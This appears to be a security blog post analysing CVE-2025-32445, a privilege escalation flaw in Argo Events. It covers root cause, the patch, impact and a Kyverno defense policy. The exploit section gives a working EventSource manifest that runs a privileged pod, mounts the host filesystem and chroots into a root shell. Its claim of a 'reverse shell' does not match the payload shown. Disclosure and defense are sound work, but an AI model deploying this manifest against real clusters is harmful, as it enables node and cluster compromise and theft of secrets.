CVE-2025-32445

Escaping the Event Loop: Complete Cluster Compromise in Argo Events

Alon Barad
Software Engineer

Jan 8, 2026 · 5 min read

Executive Summary (TL;DR)

Argo Events allowed users to define the full Kubernetes Container spec in EventSources and Sensors. This meant anyone who could create an event listener could also define `command`, `args`, and `privileged: true`, effectively granting them a root shell on the underlying node. Fixed in v1.9.6 by sanitizing the API.

A critical privilege escalation vulnerability in Argo Events allows users with limited namespace access to inject arbitrary container specifications, leading to root-level node compromise and cluster takeover.

The Hook: When "Features" Become Backdoors

Argo Events is the event-driven workflow automation framework for Kubernetes. It’s the glue that connects your triggers (Kafka, Webhooks, S3, etc.) to your actions (Argo Workflows, Serverless functions). To do its job, it needs to spin up Pods—specifically EventSource and Sensor pods—that handle the listening and triggering logic.

Here is the catch: In the world of Kubernetes operators, there is a delicate balance between flexibility and security. Developers often want to allow users to tweak resources (cpu/memory) or environment variables. But sometimes, in a fit of "maximum flexibility," developers simply map a user-facing configuration field directly to the raw Kubernetes API structs.

CVE-2025-32445 is exactly that scenario. The Argo team allowed the template.container field in their Custom Resource Definitions (CRDs) to map directly to the core/v1.Container struct. This is the equivalent of a web server allowing you to edit its own nginx.conf via a POST request. It’s not just a bug; it’s an open invitation to takeover.

The Flaw: A Struct Too Far

The root cause is a classic case of insecure API design, tracked as CWE-250 (Execution with Unnecessary Privileges). When defining the EventSource CRD, the Go code essentially said, "Hey, whatever a standard Kubernetes container looks like, just let the user put that here."

Because of this direct mapping, the validation layer was non-existent for critical security fields. The Kubernetes Container struct includes powerful fields like:

  • command / args: The binary to run and its arguments.
  • securityContext: The privileges (Linux capabilities, running as root, privileged mode).
  • volumeMounts: Which filesystems the container can touch.

The Argo controller, acting as the helpful butler, would take this user-supplied config, merge it with its own defaults using the mergo library, and happily ask the Kubernetes API Server to schedule the resulting monstrosity. The controller runs with high privileges (it creates pods), but it was allowing low-privilege users (those who can just create an EventSource in their namespace) to dictate how those pods ran.

The Code: The Smoking Gun

Let's look at the fix to understand the severity of the flaw. The patch in commit 18412293a699f559848b00e6e459c9ce2de0d3e2 replaces the standard Kubernetes struct with a neutered, custom version.

Before (The Vulnerable Code): The API definition likely used the upstream Kubernetes core/v1.Container type directly, or a struct that mirrored it completely.

After (The Sanitized Code): The developers introduced a restricted type io.argoproj.events.v1alpha1.Container. Notice what is conspicuously missing from the valid fields list:

// Restricted Container struct (pseudo-code based on the patch)
type Container struct {
    // Command, Args, and Image are GONE.
    // Users can no longer override the entrypoint or the binary.

    VolumeMounts []corev1.VolumeMount        `json:"volumeMounts,omitempty"`
    Resources    corev1.ResourceRequirements `json:"resources,omitempty"`
    // ... other benign fields ...
}

By explicitly removing command, args, and image from the accepted JSON/YAML schema, the controller ensures that the Pod only runs the intended Argo binary. Even if an attacker tries to inject command: ["/bin/bash"], the unmarshaller for the new struct will simply ignore it (or fail validation), preventing the execution flow hijack.

The Exploit: From YAML to Root

This vulnerability is trivial to weaponize. If you are a developer with access to a single namespace and permission to create EventSource objects, you own the cluster. There is no complex memory corruption or race condition here; it is pure configuration abuse.

The Attack Chain:

  1. Target: A generic K8s cluster running Argo Events < 1.9.6.
  2. Payload: Create an EventSource that mounts the host filesystem and executes a reverse shell.
apiVersion: argoproj.io/v1alpha1
kind: EventSource
metadata:
  name: pwn-cluster
spec:
  webhook:
    # Any valid event source config works; we only care about the template
    pwn:
      port: "12000"
      endpoint: /pwn
      method: POST
  template:
    container:
      # Override the Argo binary with our shell
      command: ["/bin/sh", "-c"]
      # The payload: chroot into the mounted host filesystem and spawn a shell
      args: ["chroot /host /bin/bash"]
      securityContext:
        privileged: true
      volumeMounts:
        - name: host-root
          mountPath: /host
    volumes:
      - name: host-root
        hostPath:
          path: /
  3. Execution: Apply this YAML. The Argo Controller sees a new EventSource, reconciles it, and spawns a Pod.
  4. Result: The Pod starts. Instead of listening for webhooks, it chroots into the host filesystem. You are now effectively root on the underlying Kubernetes Node. From there, you can grab the kubelet credentials or read etcd data if available.

The Impact: Why This Is a 9.9

A CVSS score of 9.9 is reserved for the "End of Days" scenario. Why does this qualify? Because it breaks the fundamental promise of Kubernetes multi-tenancy.

Privilege Escalation: You go from Namespace Editor (Low Priv) to Node Root (High Priv).

Scope Change (S:C): Once you compromise a Node, you effectively compromise the Cluster. You can access secrets from other namespaces scheduled on that node, potentially steal the Service Account tokens of system components, or manipulate the container runtime directly.

This isn't just about reading data; it's about integrity and availability. An attacker could wipe the node, deploy cryptominers, or silently backdoor the cluster configuration. If your organization uses Argo Events to manage production deployments, this flaw allows an attacker to inject malicious code into your software supply chain.

The Fix: Closing the Window

The remediation is straightforward but urgent. You must upgrade to Argo Events v1.9.6 or later immediately. This version enforces the restricted container schema.

[!NOTE] Residual Risk: The patch removes command and args, but it still allows volumeMounts and securityContext in some capacity. While you can no longer easily execute a shell, you might still be able to mount sensitive volumes if the Pod template allows it. Defense-in-depth is required.

Defense in Depth: Don't rely solely on the software patch. Use Policy Enforcement (Kyverno, OPA Gatekeeper) or Pod Security Admission (PSA) to ban privileged pods and hostPath volumes globally. If Argo Events hadn't allowed privileged: true, this exploit would have been significantly harder, regardless of the API flaw.
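As a concrete defense-in-depth example, a Kyverno ClusterPolicy along these lines blocks privileged pods cluster-wide. This is a sketch modeled on Kyverno's well-known disallow-privileged-containers policy; adapt the name, scope, and enforcement action to your cluster before use:

```yaml
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: disallow-privileged-containers
spec:
  validationFailureAction: Enforce
  rules:
    - name: privileged-containers
      match:
        any:
          - resources:
              kinds:
                - Pod
      validate:
        message: "Privileged containers are not allowed."
        pattern:
          spec:
            containers:
              # If securityContext is present, privileged must be false.
              - =(securityContext):
                  =(privileged): "false"
```

A similar rule banning hostPath volumes would have neutralized the second half of the exploit chain as well.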


Technical Appendix

CVSS Score: 9.9 / 10 (Critical)
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
EPSS Probability: 0.11% (top 70% most exploited)

Affected Systems

  • Argo Events Controller
  • Kubernetes clusters running Argo Events < 1.9.6

Affected Versions Detail

Product: argo-events (argoproj)
Affected Versions: < 1.9.6
Fixed Version: 1.9.6

Attack Vector: Network (API)
Privileges Required: Low (Namespace Edit)
CVSS v3.1: 9.9 (Critical)
CWE: CWE-250 (Execution with Unnecessary Privileges)
Impact: Cluster Admin / Host Root
Patch Status: Released (v1.9.6)
CWE-250
Execution with Unnecessary Privileges

The software performs an operation at a privilege level that is higher than the minimum level required, which creates a new attack surface.

Vulnerability Timeline

  • 2025-03-21: Fix commit pushed to GitHub
  • 2025-04-15: Security Advisory Published
  • 2025-04-16: NVD Analysis
